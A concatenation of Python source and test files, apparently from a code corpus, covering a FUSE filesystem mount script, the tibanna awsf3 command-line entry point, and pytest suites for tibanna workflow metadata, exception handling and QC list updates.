parser.add_argument(
'--disk-cache-size',
default=2**30,
type=int)
parser.add_argument(
'--disk-cache-dir',
default='/tmp/xx')
parser.add_argument(
'--lru-capacity',
default=400,
type=int)
parser.add_argument(
'--aws-profile',
default=None,
type=str)
parser.add_argument(
'-l', '--log',
default=None,
type=str)
args = vars(parser.parse_args())
if not os.path.isdir(args['mountpoint']):
try:
Path(args['mountpoint']).mkdir(mode=0o644, parents=True, exist_ok=True)
except OSError as e:
print("Mount point must be a directory: {}".format(args['mountpoint']),
file=sys.stderr)
print(e.strerror, file=sys.stderr)
cmd = 'umount -l '+args['mountpoint']
os.system(cmd)
sys.exit(1)
logger = logging.getLogger('simple-s3fs')
logger.setLevel(logging.INFO)
if args['log']:
hdlr = logging.FileHandler(args['log'])
formatter = logging.Formatter('%(asctime)s %(levelname)s %(module)s: %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
bucket = args['mountpoint'].split('/')[-1]
start_msg = """
Mounting HTTP Filesystem...
bucket: {bucket}
mountpoint: {mountpoint}
foreground: {foreground}
""".format(bucket=bucket,
mountpoint=args['mountpoint'],
foreground=args['foreground'])
print(start_msg, file=sys.stderr)
fuse = FUSE(
HttpFs(
bucket,
disk_cache_size=args['disk_cache_size'],
disk_cache_dir=args['disk_cache_dir'],
lru_capacity=args['lru_capacity'],
block_size=args['block_size'],
aws_profile=args['aws_profile'],
logger = logger
),
args['mountpoint'],
foreground=args['foreground'],
attr_timeout=0.0,
entry_timeout=0.0
)
if __name__ == "__main__":
main()
``` |
{
"source": "4dn-dcic/tibanna",
"score": 2
} |
#### File: tibanna/awsf3/__main__.py
```python
import argparse
import inspect
from tibanna._version import __version__ # for now use the same version as tibanna
from . import utils
PACKAGE_NAME = 'awsf3'
class Subcommands(object):
def __init__(self):
pass
@property
def descriptions(self):
return {
'decode_run_json': 'decode run json',
'download_workflow': 'download workflow files',
'update_postrun_json_init': 'update json json with instance ID and file system',
'upload_postrun_json': 'upload postrun json file',
'update_postrun_json_upload_output': 'update json json with output paths/target/md5 and upload outupt',
'update_postrun_json_final': 'update postrun json with status, time stamp etc'
}
@property
def args(self):
return {
'decode_run_json':
[{'flag': ["-i", "--input-run-json"], 'help': "input run json file"}],
'download_workflow':
[],
'update_postrun_json_init':
[{'flag': ["-i", "--input-json"], 'help': "input run/postrun json file"},
{'flag': ["-o", "--output-json"], 'help': "output postrun json file"}],
'update_postrun_json_upload_output':
[{'flag': ["-i", "--input-json"], 'help': "input run/postrun json file"},
{'flag': ["-e", "--execution-metadata-file"],
'help': "execution metadata file (output json of cwltool / cromwell)"},
{'flag': ["-m", "--md5file"], 'help': "text file storing md5 values for output files"},
{'flag': ["-o", "--output-json"], 'help': "output postrun json file"},
{'flag': ["-L", "--language"], 'help': "language", 'default': "cwl_v1"},
{'flag': ["-u", "--endpoint-url"], 'help': "s3 vpc endpoint url"}],
'upload_postrun_json':
[{'flag': ["-i", "--input-json"], 'help': "input postrun json file to upload to s3"}],
'update_postrun_json_final':
[{'flag': ["-i", "--input-json"], 'help': "input run/postrun json file"},
{'flag': ["-o", "--output-json"], 'help': "output postrun json file"},
{'flag': ["-l", "--logfile"], 'help': "Tibanna awsem log file"}],
}
def decode_run_json(input_run_json):
utils.decode_run_json(input_run_json)
def download_workflow():
utils.download_workflow()
def update_postrun_json_init(input_json, output_json):
utils.update_postrun_json_init(input_json, output_json)
def update_postrun_json_upload_output(input_json, execution_metadata_file, md5file, output_json, language, endpoint_url):
utils.update_postrun_json_upload_output(input_json, execution_metadata_file, md5file, output_json, language, endpoint_url=endpoint_url)
def upload_postrun_json(input_json):
utils.upload_postrun_json(input_json)
def update_postrun_json_final(input_json, output_json, logfile):
utils.update_postrun_json_final(input_json, output_json, logfile)
def main(Subcommands=Subcommands):
"""
Execute the program from the command line
"""
scs = Subcommands()
# the primary parser is used for awsf -v or -h
primary_parser = argparse.ArgumentParser(prog=PACKAGE_NAME, add_help=False)
primary_parser.add_argument('-v', '--version', action='version',
version='%(prog)s ' + __version__)
# the secondary parser is used for the specific run mode
secondary_parser = argparse.ArgumentParser(prog=PACKAGE_NAME, parents=[primary_parser])
subparsers = secondary_parser.add_subparsers(
title=PACKAGE_NAME + ' subcommands',
description='choose one of the following subcommands to run ' + PACKAGE_NAME,
dest='subcommand',
metavar='subcommand: {%s}' % ', '.join(scs.descriptions.keys())
)
subparsers.required = True
def add_arg(name, flag, **kwargs):
subparser[name].add_argument(flag[0], flag[1], **kwargs)
def add_args(name, argdictlist):
for argdict in argdictlist:
add_arg(name, **argdict)
subparser = dict()
for sc, desc in scs.descriptions.items():
subparser[sc] = subparsers.add_parser(sc, help=desc, description=desc)
if sc in scs.args:
add_args(sc, scs.args[sc])
# two step argument parsing
# first check for top level -v or -h (i.e. `tibanna -v`)
(primary_namespace, remaining) = primary_parser.parse_known_args()
# get subcommand-specific args
args = secondary_parser.parse_args(args=remaining, namespace=primary_namespace)
subcommandf = eval(args.subcommand)
sc_args = [getattr(args, sc_arg) for sc_arg in inspect.getargspec(subcommandf).args]
# run subcommand
subcommandf(*sc_args)
if __name__ == '__main__':
main()
``` |
{
"source": "4dn-dcic/tibanna_ff",
"score": 2
} |
#### File: tests/post_deployment/test_pony_errors.py
```python
import pytest
import boto3
import os
import time
from tibanna_4dn.core import API
from tibanna_4dn.vars import DEV_SFN
from tests.tibanna.pony.conftest import post_new_fastqfile, get_test_json, dev_key
JSON_DIR = 'test_json/pony/'
FILE_DIR = 'tests/files/'
def test_bwa():
key = dev_key()
# prep new File
data = get_test_json('bwa-mem.json')
fq1_uuid = post_new_fastqfile(key=key, upload_file=os.path.join(FILE_DIR, 'fastq/B.R1.fastq.gz'))
fq2_uuid = post_new_fastqfile(key=key, upload_file=os.path.join(FILE_DIR, 'fastq/B.R2.fastq.gz'))
# prep input json
data['input_files'][1]['uuid'] = fq1_uuid # fastq1
data['input_files'][2]['uuid'] = fq2_uuid # fastq2
api = API()
res = api.run_workflow(data, sfn=DEV_SFN)
assert 'jobid' in res
assert 'exec_arn' in res['_tibanna']
time.sleep(60)
# Unintentionally terminate EC2 instance
ec2 = boto3.client('ec2')
ec2_res = ec2.describe_instances(Filters=[{'Name': 'tag:Name', 'Values': ['awsem-' + res['jobid']]}])
instance_id = ec2_res['Reservations'][0]['Instances'][0]['InstanceId']
ec2.terminate_instances(InstanceIds=[instance_id])
time.sleep(360)
assert api.check_status(res['_tibanna']['exec_arn']) == 'FAILED'
```
#### File: tibanna/ffcommon/conftest.py
```python
import pytest
from dcicutils.s3_utils import s3Utils
import os
import json
def pytest_runtest_setup(item):
# called for running each test in directory
print("Running lambda tests for: ", item)
valid_env = pytest.mark.skipif(not os.environ.get("S3_ENCRYPT_KEY", False),
reason='Required environment not setup to run test')
def read_event_file(event_file_name, ff_keys=None):
with open(event_file_name) as json_data:
data = json.load(json_data)
if ff_keys is not None:
data['ff_keys'] = ff_keys
return data
def minimal_postrunjson_template():
return {'Job': {'App': {},
'Input': {'Input_files_data': {},
'Input_parameters': {},
'Secondary_files_data':{}},
'Output': {},
'JOBID': '',
'start_time': ''},
'config': {'log_bucket': ''}}
```
#### File: tibanna/ffcommon/test_exceptions.py
```python
from tibanna_ffcommon.exceptions import (
exception_coordinator,
)
from tibanna.exceptions import (
StillRunningException,
AWSEMJobErrorException,
)
import pytest
import mock
@exception_coordinator("wrapped_fun", mock.Mock(side_effect=StillRunningException("metadata")))
def wrapped_fun(event, context):
raise StillRunningException("I should not be called")
# this will raise an error
@exception_coordinator("update_ffmeta", mock.Mock())
def update_ffmeta_error_fun(event, context):
raise Exception("I should raise an error")
@exception_coordinator('error_fun', mock.Mock())
def error_fun(event, context):
raise Exception("lambda made a mess")
@exception_coordinator('awsem_error_fun', mock.Mock())
def awsem_error_fun(event, context):
raise AWSEMJobErrorException('awsem made a mess')
def test_exception_coordinator_errors_are_dumped_into_return_dict():
res = error_fun({'some': 'data', 'push_error_to_end': True}, None)
assert res['some'] == 'data'
assert res['error']
assert 'Error on step: error_fun' in res['error']
def test_exception_coordinator_throws_if_error_set_in_input_json():
# only throw the error because lambda name is update_ffmeta
with pytest.raises(Exception):
event = {'error': 'same like skip', 'push_error_to_end': True}
update_ffmeta_error_fun(event, None)
def test_exception_coordinator_error_thrown_if_ignored_exceptions():
# throw an error because this is an ignored exception and
# no 'error' in event json
with pytest.raises(Exception):
wrapped_fun({}, None)
def test_exception_coordinator_error_propogates():
# skip throwing an error because 'error' is in event json and the
# lambda name != update_ffmeta. error is propagated to the res
# and will be returned exactly as input
res = wrapped_fun({'error': 'should not raise', 'push_error_to_end': True}, None)
assert res['error'] == 'should not raise'
def test_exception_coordinator_skips_when_appropriate():
wrapped_fun({'skip': 'wrapped_fun'}, None)
def test_exception_coordinator_skips_in_list():
wrapped_fun({'skip': ['wrapped_fun', 'fun2']}, None)
def test_exception_coordinator_normally_doesnt_skip():
with pytest.raises(StillRunningException) as exec_nfo:
wrapped_fun({'skip': 'somebody_else'}, None)
assert exec_nfo
assert 'should not be called' in str(exec_nfo.value)
def test_exception_coordinator_calls_metadata_only_func():
with pytest.raises(StillRunningException) as exec_nfo:
wrapped_fun({'skip': 'somebody_else', 'metadata_only': 'wrapped_fun'}, None)
assert exec_nfo
assert 'metadata' in str(exec_nfo.value)
def test_exception_coordinator_add_awsem_error_to_output():
data = {"push_error_to_end": True}
res = awsem_error_fun(data, None)
assert ('error' in res)
def test_exception_coordinator_add_awsem_error_to_output():
data = {"push_error_to_end": False}
with pytest.raises(AWSEMJobErrorException) as expinfo:
awsem_error_fun(data, None)
assert 'awsem made a mess' in str(expinfo.value)
```
#### File: tibanna/ffcommon/test_portal_utils.py
```python
import copy
from tibanna_ffcommon.portal_utils import (
TibannaSettings,
ensure_list,
FFInputAbstract,
WorkflowRunMetadataAbstract,
FourfrontStarterAbstract,
FourfrontUpdaterAbstract,
ProcessedFileMetadataAbstract,
)
from tibanna_ffcommon.qc import (
QCArgumentsByTarget
)
from tibanna_ffcommon.exceptions import (
MalFormattedFFInputException
)
import pytest
import mock
import logging
def test_tibanna():
data = {'env': 'fourfront-webdev',
'settings': {'1': '1'}}
tibanna = TibannaSettings(**data)
assert tibanna
assert tibanna.as_dict() == data
def test_ensure_list():
assert ensure_list(5) == [5]
assert ensure_list('hello') == ['hello']
assert ensure_list(['hello']) == ['hello']
assert ensure_list({'a': 'b'}) == [{'a': 'b'}]
def test_ff_input_abstract():
data = {'workflow_uuid': 'a',
'config': {'log_bucket': 'b'},
'output_bucket': 'c'}
inp = FFInputAbstract(**data)
assert inp.workflow_uuid == 'a'
assert inp.config.log_bucket == 'b'
assert 'ecr' in inp.config.awsf_image
def test_ff_input_abstract_missing_field_error2():
data = {'workflow_uuid': 'a',
'output_bucket': 'c'}
with pytest.raises(MalFormattedFFInputException) as excinfo:
FFInputAbstract(**data)
assert "missing field in input json: config" in str(excinfo.value)
def test_ff_input_abstract_missing_field_error3():
data = {'config': {'log_bucket': 'b'},
'output_bucket': 'c'}
with pytest.raises(MalFormattedFFInputException) as excinfo:
FFInputAbstract(**data)
assert "missing field in input json: workflow_uuid" in str(excinfo.value)
def test_workflow_run_metadata_abstract():
data = {'workflow': 'a', 'awsem_app_name': 'b', 'app_version': 'c'}
ff = WorkflowRunMetadataAbstract(**data)
assert ff.workflow == 'a'
assert ff.awsem_app_name == 'b'
assert ff.title.startswith('b c run')
def test_workflow_run_metadata_abstract_missing_field_error1(caplog):
data = {'awsem_app_name': 'b', 'app_version': 'c'}
WorkflowRunMetadataAbstract(**data)
log = caplog.get_records('call')[0]
assert log.levelno == logging.WARNING
assert 'workflow is missing' in log.message
def test_processed_file_metadata_abstract():
data = {'uuid': 'a'}
pf = ProcessedFileMetadataAbstract(**data)
assert pf.uuid == 'a'
@pytest.fixture
def qcarginfo_bamsnap():
return {
"argument_type": "Output QC file",
"workflow_argument_name": "bamsnap_images",
"argument_to_be_attached_to": "input_vcf",
"qc_zipped": True,
"qc_unzip_from_ec2": True,
"qc_acl": "private"
}
def test_mock():
updater = FourfrontUpdaterAbstract(strict=False)
fake_wf = {'arguments': [{},{},{},qcarginfo_bamsnap]}
with mock.patch('tibanna_ffcommon.portal_utils.FourfrontUpdaterAbstract.get_metadata', return_value=fake_wf):
wf = updater.workflow
assert wf == fake_wf
def test_FourfrontUpdaterAbstract_workflow_qc_arguments(qcarginfo_bamsnap):
updater = FourfrontUpdaterAbstract(strict=False)
fake_wf = {'arguments': [qcarginfo_bamsnap]}
with mock.patch('tibanna_ffcommon.portal_utils.FourfrontUpdaterAbstract.get_metadata', return_value=fake_wf):
wf_qc_arguments = updater.workflow_arguments('Output QC file')
qcbt = QCArgumentsByTarget(wf_qc_arguments)
assert len(qcbt.qca_by_target) == 1
assert 'input_vcf' in qcbt.qca_by_target
assert len(qcbt.qca_by_target['input_vcf'].qca_list) == 1
qc1 = qcbt.qca_by_target['input_vcf'].qca_list[0]
assert qc1.qc_zipped
assert qc1.qc_unzip_from_ec2
assert qc1.qc_acl == 'private'
assert qc1.argument_to_be_attached_to == 'input_vcf'
assert qc1.workflow_argument_name == 'bamsnap_images'
assert qc1.qc_type is None
def test_parse_rna_strandedness():
report_content = '468\n0\n'
res = FourfrontUpdaterAbstract.parse_rna_strandedness_report(report_content)
assert len(res) == 2
assert res[0] == 468
assert res[1] == 0
def test_parse_fastq_first_line():
report_content = '@HWI-ST1318:469:HV2C3BCXY:1:1101:2874:1977 1:N:0:ATGTCA'
res = [FourfrontUpdaterAbstract.parse_fastq_first_line_report(report_content)]
assert len(res) == 1
assert res[0] == '@HWI-ST1318:469:HV2C3BCXY:1:1101:2874:1977 1:N:0:ATGTCA'
def test_parse_re_check():
report_content = 'clipped-mates with RE motif: 76.54 %'
res = FourfrontUpdaterAbstract.parse_re_check(report_content)
assert type(res) is float
assert res == 76.54
def test_parse_custom_fields():
custom_pf_fields = {'somearg': {'a': 'b', 'c': 'd'},
'arg2': {'x': 'y'},
'ALL': {'e': 'f'}}
common_fields = {'g': 'h', 'i': 'j'}
res = FourfrontStarterAbstract.parse_custom_fields(custom_pf_fields, common_fields, "somearg")
for fld in ['a', 'c', 'e', 'g', 'i']:
assert fld in res
assert 'x' not in res
def test_parse_custom_fields_overwrite():
"""testing custom_pf_fields overwriting common_fields"""
custom_pf_fields = {'somearg': {'a': 'b', 'c': 'd'},
'arg2': {'x': 'y'},
'ALL': {'e': 'f'}}
common_fields = {'a': 'h', 'e': 'j'}
res = FourfrontStarterAbstract.parse_custom_fields(custom_pf_fields, common_fields, "somearg")
for fld in ['a', 'c', 'e']:
assert fld in res
assert res['a'] == 'b' # common_fields overwritten by custom_pf_fields[argname]
assert res['e'] == 'f' # common_fields overwritten by custom_pf_fields[All]
def test_create_wfr_qc():
"""custom_qc_fields does not apply to wfr_qc, but common_fields do"""
updater = FourfrontUpdaterAbstract(**{'config': {'log_bucket': 'some_bucket'}}, strict=False)
updater.jobid = 'some_jobid'
updater.custom_qc_fields = {'a': 'b', 'c': 'd'}
updater.common_fields = {'a': 'h', 'e': 'j'}
updater.create_wfr_qc()
wfr_qc_uuid = list(updater.post_items['QualityMetricWorkflowrun'].keys())[0]
wfr_qc = updater.post_items['QualityMetricWorkflowrun'][wfr_qc_uuid]
assert 'e' in wfr_qc and wfr_qc['e'] == 'j' # common_fields
assert 'c' not in wfr_qc # custom_qc_fields does NOT get into wfr qc
assert 'a' in wfr_qc and wfr_qc['a'] == 'h' # common_fields NOT overwritten by custom_qc_fields
```
#### File: tibanna/ffcommon/test_wfr.py
```python
from tibanna_ffcommon.wfr import (
InputFilesForWFRMeta,
InputFileForWFRMeta,
create_ordinal,
aslist
)
import pytest
@pytest.fixture
def fake_wfrmeta_input_dict():
return {'workflow_argument_name': 'somearg',
'value': 'someuuid',
'ordinal': 1,
'dimension': '0',
'format_if_extra': 'bai'}
@pytest.fixture
def fake_wfrmeta_input_dict2():
return {'workflow_argument_name': 'somearg',
'value': 'someuuid2',
'ordinal': 2,
'dimension': '1',
'format_if_extra': 'bai'}
def test_create_ordinal():
assert create_ordinal('a') == 1
def test_create_ordinal_list():
assert create_ordinal(['a', 'b', 'c']) == [1, 2, 3]
def test_aslist():
assert aslist('a') == ['a']
assert aslist(['a']) == ['a']
assert aslist(['a', 'b']) == ['a', 'b']
def test_InputFileForWFRMeta(fake_wfrmeta_input_dict):
ipfw = InputFileForWFRMeta(**fake_wfrmeta_input_dict)
assert ipfw.workflow_argument_name == 'somearg'
assert ipfw.value == 'someuuid'
assert ipfw.ordinal == 1
assert ipfw.dimension == '0'
assert ipfw.format_if_extra == 'bai'
assert ipfw.as_dict() == fake_wfrmeta_input_dict
def test_InputFilesForWFRMeta(fake_wfrmeta_input_dict,
fake_wfrmeta_input_dict2):
ipfws = InputFilesForWFRMeta()
assert ipfws
assert ipfws.input_files == []
ipfws.append(InputFileForWFRMeta(**fake_wfrmeta_input_dict))
assert ipfws.input_files[0].as_dict() == fake_wfrmeta_input_dict
assert ipfws.as_dict() == [fake_wfrmeta_input_dict]
ipfws.append(InputFileForWFRMeta(**fake_wfrmeta_input_dict2))
assert ipfws.input_files[1].as_dict() == fake_wfrmeta_input_dict2
assert ipfws.as_dict() == [fake_wfrmeta_input_dict,
fake_wfrmeta_input_dict2]
def test_InputFilesForWFRMeta_add_input_file():
ipfws = InputFilesForWFRMeta()
# add a singleton
ipfws.add_input_files('u1', 'arg1')
expected = {'value': 'u1', 'workflow_argument_name': 'arg1',
'ordinal': 1, 'dimension': '0'}
assert ipfws.input_files[0].as_dict() == expected
# add a 1d list
ipfws.add_input_files(['u2', 'u3'], 'arg2')
expected2 = {'value': 'u2', 'workflow_argument_name': 'arg2',
'ordinal': 1, 'dimension': '0'}
expected3 = {'value': 'u3', 'workflow_argument_name': 'arg2',
'ordinal': 2, 'dimension': '1'}
assert ipfws.input_files[1].as_dict() == expected2
assert ipfws.input_files[2].as_dict() == expected3
# add a 2d list
ipfws.add_input_files([['u4', 'u5'],['u6','u7']], 'arg3', 'bai')
expected4 = {'value': 'u4', 'workflow_argument_name': 'arg3',
'ordinal': 1, 'dimension': '0-0', 'format_if_extra': 'bai'}
expected5 = {'value': 'u5', 'workflow_argument_name': 'arg3',
'ordinal': 2, 'dimension': '0-1', 'format_if_extra': 'bai'}
expected6 = {'value': 'u6', 'workflow_argument_name': 'arg3',
'ordinal': 3, 'dimension': '1-0', 'format_if_extra': 'bai'}
expected7 = {'value': 'u7', 'workflow_argument_name': 'arg3',
'ordinal': 4, 'dimension': '1-1', 'format_if_extra': 'bai'}
assert ipfws.input_files[3].as_dict() == expected4
assert ipfws.input_files[4].as_dict() == expected5
assert ipfws.input_files[5].as_dict() == expected6
assert ipfws.input_files[6].as_dict() == expected7
# testing arg names
assert set(ipfws.arg_names) == set(['arg1', 'arg2', 'arg3'])
# error trying to enter the same arg name again
with pytest.raises(Exception) as ex_info:
ipfws.add_input_files('u8', 'arg1')
assert 'Arg arg1 already exists in the list' in str(ex_info.value)
```
#### File: tibanna/pony/test_start_run.py
```python
from tibanna_4dn.start_run import start_run
def test_md5(start_run_md5_data):
res = start_run(start_run_md5_data)
def test_md5_comprehensive(start_run_md5_comprehensive_data):
res = start_run(start_run_md5_comprehensive_data)
```
#### File: tibanna/zebra/test_zebra_utils_post.py
```python
from tibanna_ffcommon.portal_utils import (
TibannaSettings,
FormatExtensionMap,
)
from tibanna_cgap.zebra_utils import (
FourfrontStarter,
FourfrontUpdater,
ProcessedFileMetadata,
)
import pytest
from dcicutils import ff_utils
from tests.tibanna.zebra.conftest import (
valid_env,
)
from tests.tibanna.ffcommon.conftest import (
minimal_postrunjson_template
)
from tests.tibanna.zebra.conftest import (
post_new_processedfile,
post_new_qc
)
@valid_env
def test_fourfront_starter(start_run_event_md5):
starter = FourfrontStarter(**start_run_event_md5)
assert starter
assert 'arguments' in starter.inp.wf_meta
assert len(starter.inp.wf_meta['arguments']) == 2
assert starter.inp.wf_meta['arguments'][1]['argument_type'] == 'Output report file'
starter.run()
assert len(starter.output_argnames) == 1
@valid_env
def test_qclist_handling():
data = {'ff_meta': {'workflow': 'cgap:workflow_bwa-mem_no_unzip-check_v10'},
'config': {'log_bucket': 'somelogbucket'},
'postrunjson': minimal_postrunjson_template(),
'_tibanna': {'env': 'fourfront-cgap', 'settings': {'1': '1'}}}
updater = FourfrontUpdater(**data)
new_qc_object = next(updater.qc_template_generator())
# file w/ no quality_metric object
new_pf_uuid = post_new_processedfile(file_format='bam', key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid in updater.patch_items
assert updater.patch_items[new_pf_uuid]['quality_metric'] == new_qc_object['uuid']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
# file w/ quality_metric object of same type
existing_qc_uuid = post_new_qc('QualityMetricBamcheck', key=updater.tibanna_settings.ff_keys)
new_pf_uuid = post_new_processedfile(file_format='bam', quality_metric=existing_qc_uuid,
key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid in updater.patch_items
assert updater.patch_items[new_pf_uuid]['quality_metric'] == new_qc_object['uuid']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qc_uuid, key=updater.tibanna_settings.ff_keys)
# file w/ quality_metric object of different type
existing_qc_uuid = post_new_qc('QualityMetricWgsBamqc', key=updater.tibanna_settings.ff_keys)
new_pf_uuid = post_new_processedfile(file_format='bam', quality_metric=existing_qc_uuid,
key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid in updater.patch_items
new_qc_uuid = updater.patch_items[new_pf_uuid]['quality_metric']
assert 'quality_metric_qclist' in updater.post_items
assert new_qc_uuid in updater.post_items['quality_metric_qclist']
res = updater.post_items['quality_metric_qclist'][new_qc_uuid]
assert 'qc_list' in res
assert len(res['qc_list']) == 2
assert res['qc_list'][0]['qc_type'] == 'quality_metric_wgs_bamqc'
assert res['qc_list'][1]['qc_type'] == 'quality_metric_bamcheck'
assert res['qc_list'][0]['value'] == existing_qc_uuid
assert res['qc_list'][1]['value'] == new_qc_object['uuid']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qc_uuid, key=updater.tibanna_settings.ff_keys)
# file w/ qc list with only quality_metric object of different type
existing_qc_uuid = post_new_qc('QualityMetricWgsBamqc', key=updater.tibanna_settings.ff_keys)
existing_qclist = [{'qc_type': 'quality_metric_wgs_bamqc',
'value': existing_qc_uuid}]
existing_qclist_uuid = post_new_qc('QualityMetricQclist', qc_list=existing_qclist,
key=updater.tibanna_settings.ff_keys)
new_pf_uuid = post_new_processedfile(file_format='bam', quality_metric=existing_qclist_uuid,
key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid not in updater.patch_items
assert existing_qclist_uuid in updater.patch_items
assert 'qc_list' in updater.patch_items[existing_qclist_uuid]
assert len(updater.patch_items[existing_qclist_uuid]['qc_list']) == 2
res = updater.patch_items[existing_qclist_uuid]
assert res['qc_list'][0]['qc_type'] == 'quality_metric_wgs_bamqc'
assert res['qc_list'][1]['qc_type'] == 'quality_metric_bamcheck'
assert existing_qc_uuid in res['qc_list'][0]['value']
assert new_qc_object['uuid'] in res['qc_list'][1]['value']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qclist_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qc_uuid, key=updater.tibanna_settings.ff_keys)
# file w/ qc list with only quality_metric object of same type
existing_qc_uuid = post_new_qc('QualityMetricWgsBamqc', key=updater.tibanna_settings.ff_keys)
existing_qclist = [{'qc_type': 'quality_metric_bamcheck',
'value': existing_qc_uuid}]
existing_qclist_uuid = post_new_qc('QualityMetricQclist', qc_list=existing_qclist,
key=updater.tibanna_settings.ff_keys)
new_pf_uuid = post_new_processedfile(file_format='bam', quality_metric=existing_qclist_uuid,
key=updater.tibanna_settings.ff_keys)
updater.patch_qc(new_pf_uuid, new_qc_object['uuid'], 'quality_metric_bamcheck')
assert new_pf_uuid not in updater.patch_items
assert existing_qclist_uuid in updater.patch_items
assert 'qc_list' in updater.patch_items[existing_qclist_uuid]
assert len(updater.patch_items[existing_qclist_uuid]['qc_list']) == 1
res = updater.patch_items[existing_qclist_uuid]
assert res['qc_list'][0]['qc_type'] == 'quality_metric_bamcheck'
assert res['qc_list'][0]['value'] == new_qc_object['uuid']
ff_utils.delete_metadata(new_pf_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qclist_uuid, key=updater.tibanna_settings.ff_keys)
ff_utils.delete_metadata(existing_qc_uuid, key=updater.tibanna_settings.ff_keys)
```
#### File: tibanna/zebra/test_zebra_utils.py
```python
from tibanna_cgap.vars import (
DEFAULT_PROJECT,
DEFAULT_INSTITUTION
)
from tibanna_ffcommon.portal_utils import (
TibannaSettings,
FormatExtensionMap,
)
from tibanna_cgap.zebra_utils import (
FourfrontStarter,
FourfrontUpdater,
ZebraInput
)
from tests.tibanna.zebra.conftest import valid_env, logger
import mock
@valid_env
def test_tibanna():
data = {'env': 'fourfront-cgap',
'settings': {'1': '1'}}
tibanna = TibannaSettings(**data)
assert tibanna
assert tibanna.as_dict() == data
@valid_env
def test_format_extension_map():
data = {'env': 'fourfront-cgap',
'settings': {'1': '1'}}
tibanna = TibannaSettings(**data)
fe_map = FormatExtensionMap(tibanna.ff_keys)
assert(fe_map)
assert 'bwt' in fe_map.fe_dict.keys()
def test_array_uuid():
"""test for object_key and bucket name auto-filled for an array uuid"""
# This test requires the following files to have metadata (not necessarily the physical file)
# eda72adf-3999-4ef4-adf7-58a64a9044d8, eda9be6d-0ecd-4bad-bd07-6e1a7efc98be
# with accessions GAPFIQNHLO6D and GAPFIZ25WPXE
# on cgapwolf
# the format and status of these file items should be rck_gz and uploaded as well.
input_file_list = [
{
"workflow_argument_name": "input_rcks",
"uuid": ["eda72adf-3999-4ef4-adf7-58a64a9044d8", "eda9be6d-0ecd-4bad-bd07-6e1a7efc98be"]
}
]
_tibanna = {'env': 'fourfront-cgapwolf',
'settings': {'1': '1'}}
inp = ZebraInput(workflow_uuid='a',
config={'log_bucket': 'b'},
output_bucket='c',
input_files=input_file_list,
_tibanna=_tibanna)
inputfiles = inp.input_files.as_dict()
assert 'bucket_name' in inputfiles[0]
assert 'object_key' in inputfiles[0]
assert inputfiles[0]['bucket_name'] == 'elasticbeanstalk-fourfront-cgapwolf-wfoutput'
assert len(inputfiles[0]['object_key']) == 2
assert inputfiles[0]['object_key'][0] == "<KEY>"
assert inputfiles[0]['object_key'][1] == "<KEY>"
@valid_env
def test_extra_file_rename():
"""Test for rename tag working for extra files"""
# This test requires the following files to have metadata (not necessarily the physical file)
# eda72adf-3999-4ef4-adf7-58a64a9044d8, eda9be6d-0ecd-4bad-bd07-6e1a7efc98be
# with accessions GAPFIQNHLO6D and GAPFIZ25WPXE
# on cgapwolf
# with extra files with format rck_gz_tbi and status uploaded
# the format and status of these file items should be rck_gz and uploaded as well.
input_file_list = [
{
"bucket_name": "bucket1",
"workflow_argument_name": "input_rcks",
"uuid": ["eda72adf-3999-4ef4-adf7-58a64a9044d8", "eda9be6d-0ecd-4bad-bd07-6e1a7efc98be"],
"object_key": ["<KEY>", "<KEY>"],
"rename": ["haha.rck.gz", "lala.rck.gz"]
}
]
_tibanna = {'env': 'fourfront-cgapwolf',
'settings': {'1': '1'}}
inp = ZebraInput(workflow_uuid='a',
config={'log_bucket': 'b'},
output_bucket='c',
input_files=input_file_list,
_tibanna=_tibanna)
args = dict()
args['input_files'] = inp.input_files.create_unicorn_arg_input_files()
args['secondary_files'] = inp.input_files.create_unicorn_arg_secondary_files()
assert 'input_rcks' in args['secondary_files']
assert 'rename' in args['secondary_files']['input_rcks']
assert len(args['secondary_files']['input_rcks']['rename']) == 2
assert args['secondary_files']['input_rcks']['rename'][0] == ['haha.rck.gz.tbi']
assert args['secondary_files']['input_rcks']['rename'][1] == ['lala.rck.gz.tbi']
@valid_env
def test_fourfront_starter2(start_run_event_bwa_check):
starter = FourfrontStarter(**start_run_event_bwa_check)
assert starter
assert not starter.user_supplied_output_files('raw_bam')
assert len(starter.output_argnames) == 2
assert starter.output_argnames[0] == 'raw_bam'
assert starter.arg('raw_bam')['argument_type'] == 'Output processed file'
assert starter.pf('raw_bam')
starter.create_pfs()
assert len(starter.pfs) == 1
@valid_env
def test_fourfront_starter_custom_qc(start_run_event_vcfqc):
starter = FourfrontStarter(**start_run_event_vcfqc)
assert starter
outjson = starter.inp.as_dict()
assert 'custom_qc_fields' in outjson
assert 'filtering_condition' in outjson['custom_qc_fields']
@valid_env
def test_bamcheck(update_ffmeta_event_data_bamcheck):
updater = FourfrontUpdater(**update_ffmeta_event_data_bamcheck)
updater.update_qc()
target_accession = updater.accessions('raw_bam')[0]
assert target_accession == '4DNFIWT3X5RU'
assert updater.post_items
assert len(updater.post_items['quality_metric_bamcheck']) == 1
uuid = list(updater.post_items['quality_metric_bamcheck'].keys())[0]
assert 'quickcheck' in updater.post_items['quality_metric_bamcheck'][uuid]
@valid_env
def test_cmphet(update_ffmeta_event_data_cmphet):
updater = FourfrontUpdater(**update_ffmeta_event_data_cmphet)
fake_parsed_qc_json = {"by_genes":[{"name": "ENSG00000007047"}]}
fake_parsed_qc_table = {"check": "OK"}
